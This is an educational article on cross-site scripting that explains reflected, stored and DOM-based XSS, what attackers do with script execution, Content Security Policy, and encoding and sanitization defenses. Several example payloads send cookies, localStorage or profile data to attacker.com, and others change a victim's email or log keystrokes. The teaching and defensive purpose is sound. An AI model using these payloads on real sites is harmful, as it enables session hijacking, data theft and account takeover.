Understanding Cross-Site Scripting (XSS): How It Works and How to Prevent It in Your Web Apps

Educational Content: This article is written for educational purposes to help developers and cybersecurity students understand software concepts. Always follow ethical guidelines and applicable laws.

Cross-site scripting has been on the OWASP Top 10 for so long that developers sometimes treat it like a solved problem — something the framework handles automatically, or something only old codebases worry about. In practice, XSS vulnerabilities appear in new code every week, including in applications built with modern JavaScript frameworks, because the underlying mechanisms are more nuanced than "escape HTML" and because the attack surface keeps expanding as applications get more dynamic.

This post explains the three types of XSS in detail, walks through real attack scenarios including what attackers actually do once they have script execution, and covers the defense strategy that actually works in modern web applications — including why Content Security Policy matters and where it still falls short.

What Cross-Site Scripting Actually Is

Cross-site scripting is a vulnerability where an attacker manages to inject JavaScript into a page so that it runs in the context of another user's browser session. The "cross-site" label is historical and somewhat misleading: modern XSS attacks don't always involve different sites. What matters is that untrusted input gets interpreted as executable code by a browser.

The reason this is so dangerous is what JavaScript running in a browser session can do. It can read every cookie for that domain that is not marked HttpOnly, which often includes session cookies. It can read and exfiltrate the full page DOM, including any sensitive data displayed. It can make authenticated HTTP requests to your API using the victim's session. It can log every keystroke the user makes on the page. It can modify the page's appearance: overlaying fake login forms, changing displayed account balances, replacing links. All of this happens invisibly, in the victim's browser, with the victim's permissions.

Reflected XSS: The URL-Based Attack

Reflected XSS occurs when user-supplied data is included in a server response without encoding, and the user can be tricked into visiting a crafted URL containing the malicious payload.

A search page is the canonical example:

<!-- Vulnerable PHP search results page -->
<?php
$query = $_GET['q']; // user-supplied, unvalidated
?>
<h2>Search results for: <?= $query ?></h2>

An attacker sends a victim the URL: https://yoursite.com/search?q=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

When the victim clicks this link, the server reflects the script tag into the HTML response, the browser parses it as JavaScript, and the script runs — sending the victim's cookies to the attacker's server. If that session cookie isn't marked HttpOnly, the attacker can use it to hijack the session completely.

The fix is to HTML-encode any user-supplied data before inserting it into HTML:

<?php
$query = $_GET['q'] ?? '';
// htmlspecialchars converts < > " ' & to their HTML entities
$safe_query = htmlspecialchars($query, ENT_QUOTES | ENT_HTML5, 'UTF-8');
?>
<h2>Search results for: <?= $safe_query ?></h2>

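The ENT_QUOTES flag is important: without it, single quotes are left unescaped, so a value placed inside a single-quoted attribute can break out of that attribute. PHP 8.1 made ENT_QUOTES part of the default flags, but older versions default to ENT_COMPAT, which escapes only double quotes. Always pass it explicitly.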
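The same encoding rule applies in any language that builds HTML from strings. As a minimal sketch in JavaScript (the escapeHtml name and its entity table are illustrative, not a library API), the function below escapes the same five characters and shows the search payload from above rendered inert:

```javascript
// Hypothetical helper, not a library API: escapes the five characters that
// matter when untrusted text is placed in HTML body or quoted-attribute context.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeHtml(value) {
  // Coerce to string so numbers, null, and undefined do not throw.
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

const payload =
  "<script>document.location='https://attacker.com/steal?c='+document.cookie</script>";

// The browser will display the payload as text instead of executing it.
console.log(`<h2>Search results for: ${escapeHtml(payload)}</h2>`);
```

This covers HTML body and quoted-attribute contexts only. Data placed inside a script block, a URL, or a CSS value needs encoding appropriate to that context.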

Stored XSS: The Persistent Attack

Stored XSS is more dangerous than reflected XSS because the malicious payload is saved to the application's database and served to every user who views the affected page, without requiring the victim to click a crafted link.

Comment sections, user profiles, forum posts, product reviews, chat messages, and any other feature where user-supplied text is stored and displayed are all potential stored XSS vectors. An attacker submits a comment containing <script>/* malicious code */</script>, your application stores it, and every subsequent visitor who loads that page receives and executes the script.

The payload in a stored XSS attack can be more sophisticated because it doesn't need to survive URL encoding:

<!-- A stored XSS payload that steals session cookies and sends them to an attacker -->
<script>
fetch('https://attacker.com/log', {
    method: 'POST',
    body: JSON.stringify({
        cookies: document.cookie,
        url: location.href,
        userAgent: navigator.userAgent,
        localStorage: JSON.stringify(localStorage)
    })
});
</script>

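The fix is the same in principle: encode before displaying. Store the content exactly as submitted and encode it at every output point, because the correct encoding depends on the context in which the data is rendered. If you need to accept some HTML from users, run it through a sanitizer. Sanitizing that HTML before it is stored adds a safety net, because even if you handle output correctly today, you might add a raw display somewhere tomorrow: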

<?php
// When saving user content
$comment = $_POST['comment'] ?? '';

// Option 1: Store raw, always encode on output (preferred)
// Assumes $db is an existing PDO connection and $post_id was validated earlier
$stmt = $db->prepare("INSERT INTO comments (post_id, user_id, content) VALUES (?, ?, ?)");
$stmt->execute([$post_id, $_SESSION['user_id'], $comment]);

// When displaying:
echo htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8');

// Option 2: If you need to allow some HTML (user-submitted rich text),
// use a proper HTML sanitization library (here HTMLPurifier, loaded via Composer)
require 'vendor/autoload.php';
$config = HTMLPurifier_Config::createDefault();
$config->set('HTML.Allowed', 'b,i,u,em,strong,a[href],p,br');
$purifier = new HTMLPurifier($config);
$safe_html = $purifier->purify($comment); // only the listed tags and attributes survive
echo $safe_html; // already sanitized, so do not pass it through htmlspecialchars()
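To make the "store raw, encode on output" pattern concrete outside PHP, here is a small JavaScript sketch. The in-memory comments array stands in for the database, and saveComment, renderComments, and escapeHtml are hypothetical names chosen for illustration:

```javascript
// Hypothetical in-memory stand-in for the comments table.
const comments = [];

// Hypothetical helper: escapes the characters that are significant in HTML.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function saveComment(author, content) {
  // Stored exactly as submitted; no encoding happens at write time.
  comments.push({ author, content });
}

function renderComments() {
  // Every field is encoded here, at the point where it enters HTML.
  return comments
    .map((c) => `<li><strong>${escapeHtml(c.author)}</strong>: ${escapeHtml(c.content)}</li>`)
    .join('\n');
}

saveComment('mallory', '<script>/* malicious code */</script>');
console.log(renderComments());
```

Keeping the stored value raw means the same record can later be encoded differently for JSON, plain-text email, or CSV output without first undoing an HTML-specific transformation.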

DOM-Based XSS: The Client-Side Vulnerability

DOM-based XSS is distinct from reflected and stored XSS in that the vulnerability lives entirely in client-side JavaScript — no server-side code is involved in the injection. The server sends a legitimate response, but JavaScript in that response reads data from an "attacker-controlled source" and writes it to a "dangerous sink" without sanitization.

Sources include: location.href, location.search, location.hash, document.referrer, window.name. Sinks include: innerHTML, outerHTML, document.write(), eval(), setTimeout() with string arguments, jQuery's $() with untrusted HTML, and location.href when set to attacker-controlled values.

// Vulnerable DOM XSS - reading URL fragment and writing to innerHTML
// Current browsers generally percent-encode < and > in location.hash,
// so it is the decode step that turns the fragment back into markup.
const unsafeName = decodeURIComponent(location.hash.slice(1)); // reads the #... part of the URL
document.getElementById('welcome').innerHTML = 'Hello ' + unsafeName;
// Attacker's URL: https://yoursite.com/dashboard#<img src=x onerror=alert(1)>

// Safe approach - use textContent instead of innerHTML
const displayName = decodeURIComponent(location.hash.slice(1));
document.getElementById('welcome').textContent = 'Hello ' + displayName;

// Or if you must use innerHTML, sanitize first (DOMPurify loaded through a bundler)
import DOMPurify from 'dompurify';
document.getElementById('welcome').innerHTML = 'Hello ' + DOMPurify.sanitize(displayName);
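HTML sanitization does not cover the navigation sinks listed earlier, such as location.href set to an attacker-controlled value, where a javascript: URL executes code. One possible guard, sketched here under the assumption that only http and https destinations are legitimate, is to parse the value with the standard URL class and check its scheme. The toSafeHttpUrl name and the base URL are hypothetical:

```javascript
// Hypothetical helper: returns a normalized URL string when the scheme is
// http or https, otherwise null. The default base is an assumed placeholder.
function toSafeHttpUrl(untrusted, base = 'https://yoursite.com/') {
  let url;
  try {
    // The URL parser strips leading whitespace, removes tabs and newlines,
    // and lowercases the scheme, which defeats common obfuscation tricks.
    url = new URL(untrusted, base);
  } catch {
    return null; // not parseable as a URL at all
  }
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : null;
}

console.log(toSafeHttpUrl('/dashboard'));          // https://yoursite.com/dashboard
console.log(toSafeHttpUrl('javascript:alert(1)')); // null
```

In a browser the result would be assigned to location.href only when it is not null. This check blocks script-bearing schemes. It does not by itself prevent open redirects to other http or https sites, which would need a host allowlist.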

DOM XSS is particularly common in single-page applications because JavaScript handles routing and rendering. Any place where your JavaScript reads data from the URL, from postMessage, from localStorage, or from other sources and writes it into the DOM is a potential DOM XSS point.
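For the postMessage source in particular, a common precaution is to check the sender's origin and the shape of the data before anything reaches the DOM. The sketch below assumes a hypothetical allowlist of origins and a hypothetical acceptMessage helper. The listener wiring appears only as a comment so the logic can run outside a browser:

```javascript
// Assumed allowlist; replace with the origins your application really talks to.
const TRUSTED_ORIGINS = new Set(['https://yoursite.com', 'https://widgets.yoursite.com']);

// Hypothetical helper: returns the message text if it is acceptable, otherwise null.
function acceptMessage(event) {
  if (!TRUSTED_ORIGINS.has(event.origin)) return null; // unknown sender
  if (typeof event.data !== 'string') return null;      // unexpected shape
  return event.data;
}

// In a browser this would be wired up roughly as:
//   window.addEventListener('message', (event) => {
//     const text = acceptMessage(event);
//     if (text !== null) document.getElementById('welcome').textContent = text;
//   });

console.log(acceptMessage({ origin: 'https://attacker.com', data: '<img src=x onerror=alert(1)>' })); // null
console.log(acceptMessage({ origin: 'https://yoursite.com', data: 'Hello' })); // Hello
```

An origin check narrows who can send data, but the accepted value is still written with textContent, because a trusted origin can itself be compromised.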

What Attackers Do With XSS (Beyond Cookie Theft)

Cookie theft via document.cookie is the most well-known XSS exploitation technique, but modern applications have mostly mitigated it through HttpOnly cookies. Attackers have adapted with more sophisticated techniques:

Session riding (CSRF via XSS). Even without accessing the session cookie, an attacker's injected script can make authenticated API requests using the victim's session. The browser automatically includes cookies with same-origin requests. The script can read responses (since it's executing on the same origin as the application) and exfiltrate data or perform actions.

// XSS payload that makes an authenticated request and exfiltrates data
fetch('/api/user/profile')
    .then(r => r.json())
    .then(data => {
        fetch('https://attacker.com/exfil', {
            method: 'POST',
            body: JSON.stringify(data)
        });
    });

// XSS payload that changes email address via the API
fetch('/api/user/update', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({email: 'attacker@evil.com'})
});

Credential harvesting. Replace the login form with a visually identical fake that sends credentials to the attacker. Since the script runs on your domain, the URL in the address bar shows your domain. Users see no indication anything is wrong.

Keylogging. document.addEventListener('keydown', function(e) { /* log and send */ }). Captures everything typed while the victim is on any page of the application.

Account takeover via password reset. Trigger a password reset email request via the API (using the victim's session), or change the victim's email address to attacker-controlled before triggering a password reset.

Content Security Policy: What It Does and Where It Falls Short

Content Security Policy (CSP) is an HTTP response header that tells browsers which sources of scripts, styles, images, and other resources to trust. When correctly configured, it can prevent XSS payloads from loading external resources or sending data to attacker-controlled servers, even when an injection succeeds.

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.example.com; img-src 'self' data: https:; connect-src 'self'; frame-ancestors 'none'; base-uri 'self'

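This policy says: scripts may only be loaded from the same origin and from trusted-cdn.example.com; inline scripts (<script>...</script>) and inline event handlers are blocked, because script-src does not include 'unsafe-inline'; eval() is blocked, because 'unsafe-eval' is absent; and fetch() or XMLHttpRequest calls to external domains are blocked, because connect-src allows only 'self'. Note that img-src still allows any https: host, so an image request can carry data out. Restrict it to specific hosts if you rely on CSP to limit exfiltration.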

CSP significantly raises the bar for XSS exploitation even when an injection point exists. Under the policy above, an injected inline script does not run, an injected script tag cannot load code from an attacker's server, and any script that does execute cannot send data to an external server via fetch() or XMLHttpRequest.
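Long policies are easier to review when they are assembled from structured data rather than typed as one string. The following sketch rebuilds the header shown above from a directive map and flags the two keywords that most weaken script-src. Both buildCsp and weakensScriptPolicy are hypothetical helper names:

```javascript
// Hypothetical helper: joins a directive map into a CSP header value.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(' ')}`)
    .join('; ');
}

// Hypothetical check: true if scripts may run inline or through eval().
// Falls back to default-src, as browsers do when script-src is absent.
function weakensScriptPolicy(directives) {
  const sources = directives['script-src'] ?? directives['default-src'] ?? [];
  return sources.some((s) => s === "'unsafe-inline'" || s === "'unsafe-eval'");
}

const directives = {
  'default-src': ["'self'"],
  'script-src': ["'self'", 'https://trusted-cdn.example.com'],
  'img-src': ["'self'", 'data:', 'https:'],
  'connect-src': ["'self'"],
  'frame-ancestors': ["'none'"],
  'base-uri': ["'self'"],
};

console.log(`Content-Security-Policy: ${buildCsp(directives)}`);
console.log(weakensScriptPolicy(directives)); // false
```

The check is deliberately narrow. It says nothing about overly broad host sources or about directives other than script-src.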

However, CSP has important limitations:

Unsafe inline scripts are extremely common. Many applications use inline event handlers (onclick="..."), inline <script> blocks, or JavaScript URLs (href="javascript:...") that only work if the policy allows 'unsafe-inline', which defeats much of CSP's protection.

Nonce-based CSP is the correct approach but complex to implement. A random nonce, generated fresh for every response, is placed in the CSP header and added to every legitimate inline script. The browser runs those scripts and blocks injected ones, because the attacker cannot predict the nonce:

<?php
// Generate a fresh nonce for every request
$nonce = base64_encode(random_bytes(18));
header("Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{$nonce}'");
?>
<!-- All legitimate inline scripts get the nonce attribute -->
<script nonce="<?= htmlspecialchars($nonce) ?>">
    // your legitimate inline JavaScript
</script>
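The same idea carries over to a Node.js backend. This is a rough sketch rather than a drop-in implementation: buildNoncedResponse is a hypothetical helper, and a real application would generate the nonce once per response in its templating or middleware layer.

```javascript
const { randomBytes } = require('crypto');

// Hypothetical helper: returns a fresh nonce plus the header value and the
// script tag that use it. inlineScript must be trusted, developer-written code.
function buildNoncedResponse(inlineScript) {
  const nonce = randomBytes(18).toString('base64'); // 18 random bytes -> 24 base64 characters
  return {
    nonce,
    header: `default-src 'self'; script-src 'self' 'nonce-${nonce}'`,
    scriptTag: `<script nonce="${nonce}">${inlineScript}</script>`,
  };
}

const response = buildNoncedResponse('console.log("legitimate inline code");');
console.log(`Content-Security-Policy: ${response.header}`);
console.log(response.scriptTag);
```

Reusing a nonce across responses, or caching a page together with its nonce, removes the protection, because an attacker who sees one response then knows the value.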

DOM-based XSS can bypass CSP. If the attacker can steer a script that the policy already trusts, rather than injecting a new script tag, there is nothing new for the policy to block: the trusted script itself carries the attacker's data into a sink, and it does so from the application's own origin.

Defense Strategy That Actually Works

Layer these approaches for comprehensive XSS defense:

Always HTML-encode user-supplied content before inserting it into HTML: htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8').

If you need to allow rich HTML from users, use a sanitization library (HTMLPurifier for server-side PHP, DOMPurify for client-side JavaScript).

Mark session cookies as HttpOnly so that injected scripts cannot read them, and as Secure so that they are only sent over HTTPS.

Implement a Content Security Policy, with nonces if your application uses inline scripts. Even an imperfect policy raises the exploitation bar.

Avoid innerHTML in JavaScript where possible; use textContent for plain text and createElement for structured HTML.

Never use eval(), setTimeout() with string arguments, or document.write().

Use the SameSite=Strict or SameSite=Lax cookie attribute to limit cross-site request forgery. It does not stop requests issued by a script that is already running on your own origin, so it complements the measures above rather than replacing them.
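The cookie attributes recommended above can be sketched as a small helper that builds a Set-Cookie header value. The sessionCookie name, the cookie name sid, and the one-hour default lifetime are all illustrative assumptions:

```javascript
// Hypothetical helper: builds a Set-Cookie header value for a session cookie.
function sessionCookie(name, value, { sameSite = 'Lax', maxAgeSeconds = 3600 } = {}) {
  return [
    `${name}=${encodeURIComponent(value)}`,
    'Path=/',
    `Max-Age=${maxAgeSeconds}`,
    'HttpOnly',              // not readable through document.cookie
    'Secure',                // only sent over HTTPS
    `SameSite=${sameSite}`,  // limits cross-site sending of the cookie
  ].join('; ');
}

console.log(sessionCookie('sid', 'abc123'));
// sid=abc123; Path=/; Max-Age=3600; HttpOnly; Secure; SameSite=Lax
```

Most web frameworks expose these attributes as session or cookie options, so in practice it is usually a matter of setting them in configuration rather than building the header by hand.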

XSS is preventable. It's entirely a matter of consistent encoding discipline and never trusting user-supplied data to be safe for HTML context without explicit sanitization. The frameworks that handle it automatically do so by enforcing this discipline by default — and the vulnerabilities appear when developers work around the default protections.

— Skand K.